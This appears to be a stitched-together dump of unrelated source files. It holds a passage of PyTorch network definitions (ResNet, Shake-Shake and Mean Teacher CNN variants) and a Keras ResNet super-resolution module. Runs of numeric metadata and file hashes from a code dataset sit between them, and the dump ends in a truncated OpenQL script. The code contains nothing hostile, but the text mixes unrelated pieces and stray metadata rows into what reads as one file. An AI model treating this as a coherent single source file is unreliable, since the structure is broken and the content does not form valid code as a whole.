nn.BatchNorm2d(block.out_channels(planes, groups)),
)
elif self.downsample_mode == 'shift_conv':
downsample = ShiftConvDownsample(in_channels=self.inplanes,
out_channels=block.out_channels(planes, groups))
else:
assert False
layers = []
layers.append(block(self.inplanes, planes, groups, stride, downsample))
self.inplanes = block.out_channels(planes, groups)
for i in range(1, blocks):
layers.append(block(self.inplanes, planes, groups))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
return self.fc1(x), self.fc2(x)
def conv3x3(in_planes, out_planes, stride=1):
"3x3 convolution with padding"
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
class BottleneckBlock(nn.Module):
@classmethod
def out_channels(cls, planes, groups):
if groups > 1:
return 2 * planes
else:
return 4 * planes
def __init__(self, inplanes, planes, groups, stride=1, downsample=None):
super().__init__()
self.relu = nn.ReLU(inplace=True)
self.conv_a1 = nn.Conv2d(inplanes, planes, kernel_size=1, bias=False)
self.bn_a1 = nn.BatchNorm2d(planes)
self.conv_a2 = nn.Conv2d(
planes, planes, kernel_size=3, stride=stride, padding=1, bias=False, groups=groups)
self.bn_a2 = nn.BatchNorm2d(planes)
self.conv_a3 = nn.Conv2d(planes, self.out_channels(
planes, groups), kernel_size=1, bias=False)
self.bn_a3 = nn.BatchNorm2d(self.out_channels(planes, groups))
self.downsample = downsample
self.stride = stride
def forward(self, x):
a, residual = x, x
a = self.conv_a1(a)
a = self.bn_a1(a)
a = self.relu(a)
a = self.conv_a2(a)
a = self.bn_a2(a)
a = self.relu(a)
a = self.conv_a3(a)
a = self.bn_a3(a)
if self.downsample is not None:
residual = self.downsample(residual)
return self.relu(residual + a)
class ShakeShakeBlock(nn.Module):
@classmethod
def out_channels(cls, planes, groups):
assert groups == 1
return planes
def __init__(self, inplanes, planes, groups, stride=1, downsample=None):
super().__init__()
assert groups == 1
self.conv_a1 = conv3x3(inplanes, planes, stride)
self.bn_a1 = nn.BatchNorm2d(planes)
self.conv_a2 = conv3x3(planes, planes)
self.bn_a2 = nn.BatchNorm2d(planes)
self.conv_b1 = conv3x3(inplanes, planes, stride)
self.bn_b1 = nn.BatchNorm2d(planes)
self.conv_b2 = conv3x3(planes, planes)
self.bn_b2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
a, b, residual = x, x, x
a = F.relu(a, inplace=False)
a = self.conv_a1(a)
a = self.bn_a1(a)
a = F.relu(a, inplace=True)
a = self.conv_a2(a)
a = self.bn_a2(a)
b = F.relu(b, inplace=False)
b = self.conv_b1(b)
b = self.bn_b1(b)
b = F.relu(b, inplace=True)
b = self.conv_b2(b)
b = self.bn_b2(b)
ab = shake(a, b, training=self.training)
if self.downsample is not None:
residual = self.downsample(x)
return residual + ab
class Shake(Function):
@classmethod
def forward(cls, ctx, inp1, inp2, training):
assert inp1.size() == inp2.size()
gate_size = [inp1.size()[0], *itertools.repeat(1, inp1.dim() - 1)]
gate = inp1.new(*gate_size)
if training:
gate.uniform_(0, 1)
else:
gate.fill_(0.5)
return inp1 * gate + inp2 * (1. - gate)
@classmethod
def backward(cls, ctx, grad_output):
grad_inp1 = grad_inp2 = grad_training = None
gate_size = [grad_output.size()[0], *itertools.repeat(1,
grad_output.dim() - 1)]
gate = Variable(grad_output.data.new(*gate_size).uniform_(0, 1))
if ctx.needs_input_grad[0]:
grad_inp1 = grad_output * gate
if ctx.needs_input_grad[1]:
grad_inp2 = grad_output * (1 - gate)
assert not ctx.needs_input_grad[2]
return grad_inp1, grad_inp2, grad_training
def shake(inp1, inp2, training=False):
return Shake.apply(inp1, inp2, training)
class ShiftConvDownsample(nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.relu = nn.ReLU(inplace=True)
self.conv = nn.Conv2d(in_channels=2 * in_channels,
out_channels=out_channels,
kernel_size=1,
groups=2)
self.bn = nn.BatchNorm2d(out_channels)
def forward(self, x):
x = torch.cat((x[:, :, 0::2, 0::2],
x[:, :, 1::2, 1::2]), dim=1)
x = self.relu(x)
x = self.conv(x)
x = self.bn(x)
return x
class GaussianNoise(nn.Module):
def __init__(self, std):
super(GaussianNoise, self).__init__()
self.std = std
def forward(self, x):
zeros_ = torch.zeros(x.size()).cuda()
n = Variable(torch.normal(zeros_, std=self.std).cuda())
return x + n
from torch.nn.utils import weight_norm
# For cifar_cnn
class CNN(nn.Module):
"""
CNN from Mean Teacher paper
"""
def __init__(self, num_classes=10, isL2 = False, sobel = False):
super(CNN, self).__init__()
self.isL2 = isL2
self.gn = GaussianNoise(0.15)
self.activation = nn.LeakyReLU(0.1)
in_dim = 2 + int(not sobel)
self.conv1a = weight_norm(nn.Conv2d(in_dim, 128, 3, padding=1))
self.bn1a = nn.BatchNorm2d(128)
self.conv1b = weight_norm(nn.Conv2d(128, 128, 3, padding=1))
self.bn1b = nn.BatchNorm2d(128)
self.conv1c = weight_norm(nn.Conv2d(128, 128, 3, padding=1))
self.bn1c = nn.BatchNorm2d(128)
self.mp1 = nn.MaxPool2d(2, stride=2, padding=0)
self.drop1 = nn.Dropout(0.5)
self.conv2a = weight_norm(nn.Conv2d(128, 256, 3, padding=1))
self.bn2a = nn.BatchNorm2d(256)
self.conv2b = weight_norm(nn.Conv2d(256, 256, 3, padding=1))
self.bn2b = nn.BatchNorm2d(256)
self.conv2c = weight_norm(nn.Conv2d(256, 256, 3, padding=1))
self.bn2c = nn.BatchNorm2d(256)
self.mp2 = nn.MaxPool2d(2, stride=2, padding=0)
self.drop2 = nn.Dropout(0.5)
self.conv3a = weight_norm(nn.Conv2d(256, 512, 3, padding=0))
self.bn3a = nn.BatchNorm2d(512)
self.conv3b = weight_norm(nn.Conv2d(512, 256, 1, padding=0))
self.bn3b = nn.BatchNorm2d(256)
self.conv3c = weight_norm(nn.Conv2d(256, 128, 1, padding=0))
self.bn3c = nn.BatchNorm2d(128)
self.ap3 = nn.AvgPool2d(6, stride=2, padding=0)
self.fc1 = weight_norm(nn.Linear(128, num_classes))
self.fc2 = weight_norm(nn.Linear(128, num_classes))
if sobel:
grayscale = nn.Conv2d(3, 1, kernel_size=1, stride=1, padding=0)
grayscale.weight.data.fill_(1.0 / 3.0)
grayscale.bias.data.zero_()
sobel_filter = nn.Conv2d(1, 2, kernel_size=3, stride=1, padding=1)
sobel_filter.weight.data[0, 0].copy_(
torch.FloatTensor([[1, 0, -1], [2, 0, -2], [1, 0, -1]])
)
sobel_filter.weight.data[1, 0].copy_(
torch.FloatTensor([[1, 2, 1], [0, 0, 0], [-1, -2, -1]])
)
sobel_filter.bias.data.zero_()
self.sobel = nn.Sequential(grayscale, sobel_filter)
for p in self.sobel.parameters():
p.requires_grad = False
else:
self.sobel = None
def forward(self, x, debug=False):
if self.sobel:
x = self.sobel(x)
x = self.activation(self.bn1a(self.conv1a(x)))
x = self.activation(self.bn1b(self.conv1b(x)))
x = self.activation(self.bn1c(self.conv1c(x)))
x = self.mp1(x)
x = self.drop1(x)
x = self.activation(self.bn2a(self.conv2a(x)))
x = self.activation(self.bn2b(self.conv2b(x)))
x = self.activation(self.bn2c(self.conv2c(x)))
x = self.mp2(x)
x = self.drop2(x)
x = self.activation(self.bn3a(self.conv3a(x)))
x = self.activation(self.bn3b(self.conv3b(x)))
x = self.activation(self.bn3c(self.conv3c(x)))
x = self.ap3(x)
x = x.view(-1, 128)
if self.isL2:
x = F.normalize(x)
#return self.fc1(x), self.fc2(x), x
return self.fc2(x), x
class CNNGauss(nn.Module):
"""
CNN from Mean Teacher paper
"""
def __init__(self, num_classes=10, isL2 = False):
super(CNNGauss, self).__init__()
self.isL2 = isL2
self.gn = GaussianNoise(0.15)
self.activation = nn.LeakyReLU(0.1)
self.conv1a = weight_norm(nn.Conv2d(3, 128, 3, padding=1))
self.bn1a = nn.BatchNorm2d(128)
self.conv1b = weight_norm(nn.Conv2d(128, 128, 3, padding=1))
self.bn1b = nn.BatchNorm2d(128)
self.conv1c = weight_norm(nn.Conv2d(128, 128, 3, padding=1))
self.bn1c = nn.BatchNorm2d(128)
self.mp1 = nn.MaxPool2d(2, stride=2, padding=0)
self.drop1 = nn.Dropout(0.5)
self.conv2a = weight_norm(nn.Conv2d(128, 256, 3, padding=1))
self.bn2a = nn.BatchNorm2d(256)
self.conv2b = weight_norm(nn.Conv2d(256, 256, 3, padding=1))
self.bn2b = nn.BatchNorm2d(256)
self.conv2c = weight_norm(nn.Conv2d(256, 256, 3, padding=1))
self.bn2c = nn.BatchNorm2d(256)
self.mp2 = nn.MaxPool2d(2, stride=2, padding=0)
self.drop2 = nn.Dropout(0.5)
self.conv3a = weight_norm(nn.Conv2d(256, 512, 3, padding=0))
self.bn3a = nn.BatchNorm2d(512)
self.conv3b = weight_norm(nn.Conv2d(512, 256, 1, padding=0))
self.bn3b = nn.BatchNorm2d(256)
self.conv3c = weight_norm(nn.Conv2d(256, 128, 1, padding=0))
self.bn3c = nn.BatchNorm2d(128)
self.ap3 = nn.AvgPool2d(6, stride=2, padding=0)
self.fc1 = weight_norm(nn.Linear(128, num_classes))
self.fc2 = weight_norm(nn.Linear(128, num_classes))
def forward(self, x, debug=False):
x = self.gn(x)
x = self.activation(self.bn1a(self.conv1a(x)))
x = self.activation(self.bn1b(self.conv1b(x)))
x = self.activation(self.bn1c(self.conv1c(x)))
x = self.mp1(x)
x = self.drop1(x)
x = self.activation(self.bn2a(self.conv2a(x)))
x = self.activation(self.bn2b(self.conv2b(x)))
x = self.activation(self.bn2c(self.conv2c(x)))
x = self.mp2(x)
x = self.drop2(x)
x = self.activation(self.bn3a(self.conv3a(x)))
x = self.activation(self.bn3b(self.conv3b(x)))
x = self.activation(self.bn3c(self.conv3c(x)))
x = self.ap3(x)
x = x.view(-1, 128)
if self.isL2:
x = F.normalize(x)
return self.fc1(x), self.fc2(x), x
class CNNSingle(nn.Module):
"""
CNN from Mean Teacher paper
"""
def __init__(self, num_classes=10, isL2 = False):
super(CNNSingle, self).__init__()
self.isL2 = isL2
self.gn = GaussianNoise(0.15)
self.activation = nn.LeakyReLU(0.1)
self.conv1a = weight_norm(nn.Conv2d(3, 128, 3, padding=1))
self.bn1a = nn.BatchNorm2d(128)
self.conv1b = weight_norm(nn.Conv2d(128, 128, 3, padding=1))
self.bn1b = nn.BatchNorm2d(128)
self.conv1c = weight_norm(nn.Conv2d(128, 128, 3, padding=1))
self.bn1c = nn.BatchNorm2d(128)
self.mp1 = nn.MaxPool2d(2, stride=2, padding=0)
self.drop1 = nn.Dropout(0.5)
self.conv2a = weight_norm(nn.Conv2d(128, 256, 3, padding=1))
self.bn2a = nn.BatchNorm2d(256)
self.conv2b = weight_norm(nn.Conv2d(256, 256, 3, padding=1))
self.bn2b = nn.BatchNorm2d(256)
self.conv2c = weight_norm(nn.Conv2d(256, 256, 3, padding=1))
self.bn2c = nn.BatchNorm2d(256)
self.mp2 = nn.MaxPool2d(2, stride=2, padding=0)
self.drop2 = nn.Dropout(0.5)
self.conv3a = weight_norm(nn.Conv2d(256, 512, 3, padding=0))
self.bn3a = nn.BatchNorm2d(512)
self.conv3b = weight_norm(nn.Conv2d(512, 256, 1, padding=0))
self.bn3b = nn.BatchNorm2d(256)
self.conv3c = weight_norm(nn.Conv2d(256, 128, 1, padding=0))
self.bn3c = nn.BatchNorm2d(128)
self.ap3 = nn.AvgPool2d(6, stride=2, padding=0)
self.fc1 = weight_norm(nn.Linear(128, num_classes))
def forward(self, x, debug=False):
x = self.activation(self.bn1a(self.conv1a(x)))
x = self.activation(self.bn1b(self.conv1b(x)))
x = self.activation(self.bn1c(self.conv1c(x)))
x = self.mp1(x)
x = self.drop1(x)
x = self.activation(self.bn2a(self.conv2a(x)))
x = self.activation(self.bn2b(self.conv2b(x)))
x = self.activation(self.bn2c(self.conv2c(x)))
x = self.mp2(x)
x = self.drop2(x)
x = self.activation(self.bn3a(self.conv3a(x)))
x = self.activation(self.bn3b(self.conv3b(x)))
x = self.activation(self.bn3c(self.conv3c(x)))
x = self.ap3(x)
# pdb.set_trace()
x = x.view(-1, 128)
if self.isL2:
x = F.normalize(x)
return self.fc1(x), x
class CNNGaussSingle(nn.Module):
"""
CNN from Mean Teacher paper
"""
def __init__(self, num_classes=10, isL2 = False):
super(CNNGaussSingle, self).__init__()
self.isL2 = isL2
self.gn = GaussianNoise(0.15)
self.activation = nn.LeakyReLU(0.1)
self.conv1a = weight_norm(nn.Conv2d(3, 128, 3, padding=1))
self.bn1a = nn.BatchNorm2d(128)
self.conv1b = weight_norm(nn.Conv2d(128, 128, 3, padding=1))
self.bn1b = nn.BatchNorm2d(128)
self.conv1c = weight_norm(nn.Conv2d(128, 128, 3, padding=1))
self.bn1c = nn.BatchNorm2d(128)
self.mp1 = nn.MaxPool2d(2, stride=2, padding=0)
self.drop1 = nn.Dropout(0.5)
self.conv2a = weight_norm(nn.Conv2d(128, 256, 3, padding=1))
self.bn2a = nn.BatchNorm2d(256)
self.conv2b = weight_norm(nn.Conv2d(256, 256, 3, padding=1))
self.bn2b = nn.BatchNorm2d(256)
self.conv2c = weight_norm(nn.Conv2d(256, 256, 3, padding=1))
self.bn2c = nn.BatchNorm2d(256)
self.mp2 = nn.MaxPool2d(2, stride=2, padding=0)
self.drop2 = nn.Dropout(0.5)
self.conv3a = weight_norm(nn.Conv2d(256, 512, 3, padding=0))
self.bn3a = nn.BatchNorm2d(512)
self.conv3b = weight_norm(nn.Conv2d(512, 256, 1, padding=0))
self.bn3b = nn.BatchNorm2d(256)
self.conv3c = weight_norm(nn.Conv2d(256, 128, 1, padding=0))
self.bn3c = nn.BatchNorm2d(128)
self.ap3 = nn.AvgPool2d(6, stride=2, padding=0)
self.fc1 = weight_norm(nn.Linear(128, num_classes))
def forward(self, x, debug=False):
x = self.gn(x)
x = self.activation(self.bn1a(self.conv1a(x)))
x = self.activation(self.bn1b(self.conv1b(x)))
x = self.activation(self.bn1c(self.conv1c(x)))
x = self.mp1(x)
x = self.drop1(x)
x = self.activation(self.bn2a(self.conv2a(x)))
x = self.activation(self.bn2b(self.conv2b(x)))
x = self.activation(self.bn2c(self.conv2c(x)))
x = self.mp2(x)
x = self.drop2(x)
x = self.activation(self.bn3a(self.conv3a(x)))
x = self.activation(self.bn3b(self.conv3b(x)))
x = self.activation(self.bn3c(self.conv3c(x)))
x = self.ap3(x)
x = x.view(-1, 128)
if self.isL2:
x = F.normalize(x)
return self.fc1(x), x
def conv3x3(in_planes, out_planes, stride=1):
"""3x3 convolution with padding"""
return nn.Conv2d(in_planes, out_planes, kernel_size=3, stride=stride,
padding=1, bias=False)
def conv1x1(in_planes, out_planes, stride=1):
"""1x1 convolution"""
return nn.Conv2d(in_planes, out_planes, kernel_size=1, stride=stride, bias=False)
class BasicBlock(nn.Module):
expansion = 1
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(BasicBlock, self).__init__()
self.conv1 = conv3x3(inplanes, planes, stride)
self.bn1 = nn.BatchNorm2d(planes)
self.relu = nn.ReLU(inplace=True)
self.conv2 = conv3x3(planes, planes)
self.bn2 = nn.BatchNorm2d(planes)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class Bottleneck(nn.Module):
expansion = 4
def __init__(self, inplanes, planes, stride=1, downsample=None):
super(Bottleneck, self).__init__()
self.conv1 = conv1x1(inplanes, planes)
self.bn1 = nn.BatchNorm2d(planes)
self.conv2 = conv3x3(planes, planes, stride)
self.bn2 = nn.BatchNorm2d(planes)
self.conv3 = conv1x1(planes, planes * self.expansion)
self.bn3 = nn.BatchNorm2d(planes * self.expansion)
self.relu = nn.ReLU(inplace=True)
self.downsample = downsample
self.stride = stride
def forward(self, x):
residual = x
out = self.conv1(x)
out = self.bn1(out)
out = self.relu(out)
out = self.conv2(out)
out = self.bn2(out)
out = self.relu(out)
out = self.conv3(out)
out = self.bn3(out)
if self.downsample is not None:
residual = self.downsample(x)
out += residual
out = self.relu(out)
return out
class ResNet(nn.Module):
def __init__(self, block, layers, num_classes=1000, isL2 = False, sobel = False):
self.inplanes = 64
self.isL2 = isL2
super(ResNet, self).__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(512 * block.expansion, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
if self.isL2:
x = F.normalize(x)
c = self.fc(x)
return c , x
class ResNetDouble(nn.Module):
def __init__(self, block, layers, num_classes=1000, isL2 = False):
self.inplanes = 64
self.isL2 = isL2
super(ResNetDouble, self).__init__()
self.conv1 = nn.Conv2d(3, 64, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = nn.BatchNorm2d(64)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2)
self.layer3 = self._make_layer(block, 256, layers[2], stride=2)
self.layer4 = self._make_layer(block, 512, layers[3], stride=2)
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(512 * block.expansion, num_classes)
self.fc2 = nn.Linear(512 * block.expansion, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
def _make_layer(self, block, planes, blocks, stride=1):
downsample = None
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
nn.BatchNorm2d(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
x = self.layer3(x)
x = self.layer4(x)
x = self.avgpool(x)
x = x.view(x.size(0), -1)
if self.isL2:
x = F.normalize(x)
c = self.fc(x)
c2 = self.fc2(x)
return c , c2, x
| 34.544931
| 121
| 0.576755
| 3,957
| 29,985
| 4.269649
| 0.065959
| 0.013377
| 0.031607
| 0.038355
| 0.850962
| 0.812548
| 0.787985
| 0.760817
| 0.739568
| 0.724297
| 0
| 0.063453
| 0.293613
| 29,985
| 867
| 122
| 34.584775
| 0.734196
| 0.02081
| 0
| 0.727407
| 0
| 0
| 0.004133
| 0
| 0
| 0
| 0
| 0
| 0.020741
| 1
| 0.071111
| false
| 0
| 0.014815
| 0.001481
| 0.162963
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13de891fdb9156030c49143b5c2dec8cbe5439bb
| 8,615
|
py
|
Python
|
ext/ANTsPyNet/antspynet/architectures/create_resnet_super_resolution_model.py
|
tsmonteiro/fmri_proc
|
ee740cfa3c3a7ef8e1ee1ebd3b286a66712e0ec1
|
[
"MIT"
] | 2
|
2021-11-16T10:00:33.000Z
|
2021-12-13T02:57:40.000Z
|
ext/ANTsPyNet/antspynet/architectures/create_resnet_super_resolution_model.py
|
tsmonteiro/fmri_proc
|
ee740cfa3c3a7ef8e1ee1ebd3b286a66712e0ec1
|
[
"MIT"
] | null | null | null |
ext/ANTsPyNet/antspynet/architectures/create_resnet_super_resolution_model.py
|
tsmonteiro/fmri_proc
|
ee740cfa3c3a7ef8e1ee1ebd3b286a66712e0ec1
|
[
"MIT"
] | 1
|
2021-12-13T02:57:27.000Z
|
2021-12-13T02:57:27.000Z
|
from keras.models import Model
from keras.layers import (Input, Activation, Add, BatchNormalization,
Conv2D, Conv2DTranspose,
MaxPooling2D, UpSampling2D,
Conv3D, Conv3DTranspose,
MaxPooling3D, UpSampling3D)
def create_resnet_super_resolution_model_2d(input_image_size,
convolution_kernel_size=(3, 3),
number_of_filters=64,
number_of_residual_blocks=5,
number_of_resnet_blocks=1
):
"""
2-D implementation of the ResNet image super resolution architecture.
Creates a keras model of the expanded image super resolution deep learning
framework based on the following python implementation:
https://github.com/titu1994/Image-Super-Resolution
Arguments
---------
input_image_size : tuple of length 3
Used for specifying the input tensor shape. The shape (or dimension) of
that tensor is the image dimensions followed by the number of channels
(e.g., red, green, and blue).
convolution_kernel_size : 2-d tuple
Specifies the kernel size
number_of_filters : integer
The number of filters for each encoding layer.
number_of_residual_blocks : integer
Number of residual blocks.
number_of_resnet_blocks : integer
Number of resnet blocks. Each block will double the upsampling amount.
Returns
-------
Keras model
A 2-D Keras model defining the network.
Example
-------
>>> model = create_resnet_super_resolution_model_2d((128, 128, 1))
>>> model.summary()
"""
def residual_block_2d(model, number_of_filters, convolution_kernel_size):
block = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='linear',
padding='same')(model)
block = BatchNormalization()(block)
block = Activation(activation='relu')(block)
block = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='linear',
padding='same')(block)
block = BatchNormalization()(block)
block = Add()([model, block])
return(block)
def upscale_block_2d(model, number_of_filters, convolution_kernel_size):
block = UpSampling2D()(model)
block = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(block)
return(block)
def resnet_block_2d(inputs, number_of_filters, convolution_kernel_size,
number_of_residual_blocks):
outputs = Conv2D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(inputs)
residual_blocks = residual_block_2d(outputs, number_of_filters,
convolution_kernel_size)
for i in range(number_of_residual_blocks):
residual_blocks = residual_block_2d(residual_blocks, number_of_filters,
convolution_kernel_size)
outputs = Add()([residual_blocks, outputs])
outputs = upscale_block_2d(outputs, number_of_filters, convolution_kernel_size)
return(outputs)
inputs = Input(shape = input_image_size)
outputs = resnet_block_2d(inputs, number_of_filters, convolution_kernel_size,
number_of_residual_blocks)
if number_of_resnet_blocks > 1:
for i in range(1, number_of_resnet_blocks):
outputs = resnet_block_2d(outputs, number_of_filters,
convolution_kernel_size, number_of_residual_blocks)
number_of_channels = input_image_size[-1]
outputs = Conv2D(filters=number_of_channels,
kernel_size=convolution_kernel_size,
activation='linear',
padding='same')(outputs)
sr_model = Model(inputs=inputs, outputs=outputs)
return(sr_model)
def create_resnet_super_resolution_model_3d(input_image_size,
convolution_kernel_size=(3, 3, 3),
number_of_filters=64,
number_of_residual_blocks=5,
number_of_resnet_blocks=1
):
"""
3-D implementation of the ResNet image super resolution architecture.
Creates a keras model of the expanded image super resolution deep learning
framework based on the following python implementation:
https://github.com/titu1994/Image-Super-Resolution
Arguments
---------
input_image_size : tuple of length 4
Used for specifying the input tensor shape. The shape (or dimension) of
that tensor is the image dimensions followed by the number of channels
(e.g., red, green, and blue).
convolution_kernel_size : 3-d tuple
Specifies the kernel size
number_of_filters : integer
The number of filters for each encoding layer.
number_of_residual_blocks : integer
Number of residual blocks.
number_of_resnet_blocks : integer
Number of resnet blocks. Each block will double the upsampling amount.
Returns
-------
Keras model
A 3-D Keras model defining the network.
Example
-------
>>> model = create_resnet_super_resolution_model_3d((128, 128, 128, 1))
>>> model.summary()
"""
def residual_block_3d(model, number_of_filters, convolution_kernel_size):
block = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='linear',
padding='same')(model)
block = BatchNormalization()(block)
block = Activation(activation='relu')(block)
block = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='linear',
padding='same')(block)
block = BatchNormalization()(block)
block = Add()([model, block])
return(block)
def upscale_block_3d(model, number_of_filters, convolution_kernel_size):
block = UpSampling3D()(model)
block = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(block)
return(block)
def resnet_block_3d(inputs, number_of_filters, convolution_kernel_size,
number_of_residual_blocks):
outputs = Conv3D(filters=number_of_filters,
kernel_size=convolution_kernel_size,
activation='relu',
padding='same')(inputs)
residual_blocks = residual_block_3d(outputs, number_of_filters,
convolution_kernel_size)
for i in range(number_of_residual_blocks):
residual_blocks = residual_block_3d(residual_blocks, number_of_filters,
convolution_kernel_size)
outputs = Add()([residual_blocks, outputs])
outputs = upscale_block_3d(outputs, number_of_filters, convolution_kernel_size)
return(outputs)
inputs = Input(shape = input_image_size)
outputs = resnet_block_3d(inputs, number_of_filters, convolution_kernel_size,
number_of_residual_blocks)
if number_of_resnet_blocks > 1:
for i in range(1, number_of_resnet_blocks):
outputs = resnet_block_3d(outputs, number_of_filters,
convolution_kernel_size, number_of_residual_blocks)
number_of_channels = input_image_size[-1]
outputs = Conv3D(filters=number_of_channels,
kernel_size=convolution_kernel_size,
activation='linear',
padding='same')(outputs)
sr_model = Model(inputs=inputs, outputs=outputs)
return(sr_model)
| 37.620087
| 90
| 0.594893
| 887
| 8,615
| 5.468997
| 0.122886
| 0.098949
| 0.12987
| 0.085756
| 0.955061
| 0.951763
| 0.935683
| 0.935683
| 0.908679
| 0.906205
| 0
| 0.016101
| 0.336738
| 8,615
| 228
| 91
| 37.785088
| 0.832867
| 0.234707
| 0
| 0.724138
| 0
| 0
| 0.015726
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068966
| false
| 0
| 0.017241
| 0
| 0.086207
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13f8ab2e56225ab2c39c34021f0f607148bf8795
| 48
|
py
|
Python
|
src/nlp_modeltrainers/__init__.py
|
TeaKatz/NLP_ModelTrainers
|
cc212f02b2c9204585ab172cef0101b5882edf92
|
[
"MIT"
] | null | null | null |
src/nlp_modeltrainers/__init__.py
|
TeaKatz/NLP_ModelTrainers
|
cc212f02b2c9204585ab172cef0101b5882edf92
|
[
"MIT"
] | null | null | null |
src/nlp_modeltrainers/__init__.py
|
TeaKatz/NLP_ModelTrainers
|
cc212f02b2c9204585ab172cef0101b5882edf92
|
[
"MIT"
] | null | null | null |
from .BaseTrainerModule import BaseTrainerModule
| 48
| 48
| 0.916667
| 4
| 48
| 11
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0625
| 48
| 1
| 48
| 48
| 0.977778
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b98b99a9381aa754eec3ed3ee063d785aaf1ab54
| 31,064
|
py
|
Python
|
examples/cpp-standalone-example/example.py
|
Hopery/OpenQL
|
f6cf78b7add50827166fd79c29dc7a8ea6fd624f
|
[
"Apache-2.0"
] | null | null | null |
examples/cpp-standalone-example/example.py
|
Hopery/OpenQL
|
f6cf78b7add50827166fd79c29dc7a8ea6fd624f
|
[
"Apache-2.0"
] | null | null | null |
examples/cpp-standalone-example/example.py
|
Hopery/OpenQL
|
f6cf78b7add50827166fd79c29dc7a8ea6fd624f
|
[
"Apache-2.0"
] | null | null | null |
from openql import openql as ql
import os
import argparse
def circuit(new_scheduler='yes', scheduler='ASAP', uniform_sched= 'no', sched_commute = 'yes', mapper='no', moves='no', maptiebreak='random', initial_placement='no', output_dir_name='compiler_output', measurement=True, log_level='LOG_NOTHING'):
output_dir = output_dir_name
ql.initialize()
ql.set_option('output_dir', output_dir)
ql.set_option('log_level', log_level)
